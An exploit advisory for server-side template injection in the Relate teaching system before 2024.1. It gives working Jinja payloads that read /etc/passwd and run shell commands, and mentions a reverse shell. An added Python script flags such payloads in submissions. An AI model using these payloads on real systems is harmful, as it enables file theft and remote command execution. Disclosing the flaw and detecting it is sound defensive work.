# Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI (Markup Sandbox function) leads to RCE
# Date: 19/04/2024
# Exploit Author: kai6u
# Vendor Homepage: https://github.com/inducer/
# Software Link: https://github.com/inducer/relate
# Affected Version: before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6)
# Fixed Version: 2024.1 (https://github.com/inducer/relate/commit/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)
# Tested on: Ubuntu 22.04

# Summary:
SSTI in the Markup Sandbox function of Relate Learning And Teaching system

# Description:
* 【Prerequisite】
  * The attacker has stolen the privilege to use Markup Sandbox. For example, the attacker is logged in as a course administrator.
  * SSTI is in the `Markup Sandbox` feature, which allows a user to check Markdown contents before publishing.

1) First, the attacker uses the Markup Sandbox feature to plant the following payload.
  * Payload:
    * `{{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }}`
  * Note that the subclasses index number in the payload depends on the Python version, so it must be changed depending on the environment.

2) Click Preview with the above payload included.
  * You will then see the contents of the `/etc/passwd` file output in the Content Preview block.
  * This is identified as an LFI vulnerability because the file should not be readable from the application side.

3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen.
  * Payload:
    * `{{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}`

4) Click Preview with the above payload included.
  * If you check the results, you will see that `ubuntu` is displayed, which is the result of executing the whoami command.
  * This is classified as an RCE vulnerability and is very dangerous because it is possible to hijack the server directly from the application side.
  * An attacker can use this feature to execute a reverse shell.

# References
https://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection
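
For reviewing content submitted to the sandbox, the following added example (not part of the original advisory and not Relate's own code) flags template blocks that reach underscore-prefixed attributes such as `__class__`, the traversal both payloads depend on. It assumes Jinja-style `{{ }}` / `{% %}` delimiters as seen in the payloads; the function names and sample submissions are constructed, and it only covers the dotted attribute syntax shown above, so it is a triage aid and not a substitute for running the fixed version.

```python
import re

# Jinja-style delimiters, assumed from the {{ ... }} payloads above.
BLOCK_RE = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.DOTALL)
# Quoted string literals are blanked so a path such as '/srv/._cache' is not
# mistaken for attribute access (escaped quotes are not handled).
STRING_RE = re.compile(r"'[^']*'|\"[^\"]*\"")
# Dotted access to a name starting with "_", the same class of attribute that
# Jinja2's SandboxedEnvironment treats as unsafe.
ATTR_RE = re.compile(r"\.\s*(_\w*)")


def unsafe_attributes(markup):
    """Return (line_number, attribute) pairs found inside template blocks."""
    findings = []
    for block in BLOCK_RE.finditer(markup):
        body = block.group(1) if block.group(1) is not None else block.group(2)
        code = STRING_RE.sub("''", body)
        line = markup.count("\n", 0, block.start()) + 1
        for name in ATTR_RE.findall(code):
            findings.append((line, name))
    return findings


def triage(submissions):
    """Map submission id -> sorted unique unsafe attribute names (flagged only)."""
    report = {}
    for sub_id, markup in submissions.items():
        names = sorted({name for _, name in unsafe_attributes(markup)})
        if names:
            report[sub_id] = names
    return report


# Constructed sample submissions; ids and text are made up for this example.
SAMPLES = {
    "preview-1": "# Week 1\n\nWelcome to {{ course.title }}.\nSee `pkg.__init__` for setup.",
    "preview-2": "Intro\n{{ 'abc'.__class__.__base__.__subclasses__() }}",
    "preview-3": "{{ files['/srv/._cache'] }} and {% if user.is_staff %}staff{% endif %}",
}

if __name__ == "__main__":
    for sub_id, names in triage(SAMPLES).items():
        print(sub_id, names)
```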